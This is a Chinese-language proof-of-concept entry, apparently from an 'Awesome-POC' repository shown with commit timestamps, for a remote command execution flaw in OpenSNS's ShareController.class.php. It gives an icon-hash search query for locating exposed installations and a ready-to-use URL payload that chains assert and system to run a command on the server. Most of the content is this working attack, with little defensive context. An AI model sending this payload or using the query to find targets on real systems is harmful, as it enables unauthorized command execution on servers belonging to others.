Awesome-POC/CMS漏洞/OpenSNS Application ShareController.class.php 远程命令执行漏洞.md

35 lines
788 B
Markdown
Raw Normal View History

2022-05-18 16:23:08 +08:00
# OpenSNS Application ShareController.class.php 远程命令执行漏洞
2022-02-20 16:14:31 +08:00
## 漏洞描述
OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令
## 漏洞影响
```
OpenSNS
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2022-02-20 16:14:31 +08:00
```
icon_hash="1167011145"
```
## 漏洞复现
登录页面如下
2022-12-05 11:09:28 +08:00
![](./images/202202170923817.png)
2022-02-20 16:14:31 +08:00
2022-05-18 16:23:08 +08:00
存在漏洞的文件 `Application/Weibo/Controller/ShareController.class.php`
2022-12-05 11:09:28 +08:00
![image-20220518154015894](./images/202205181540972.png)
2022-05-18 16:23:08 +08:00
2022-02-20 16:14:31 +08:00
发送Payload
```plain
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
```
2022-12-05 11:09:28 +08:00
![](./images/202202170923310.png)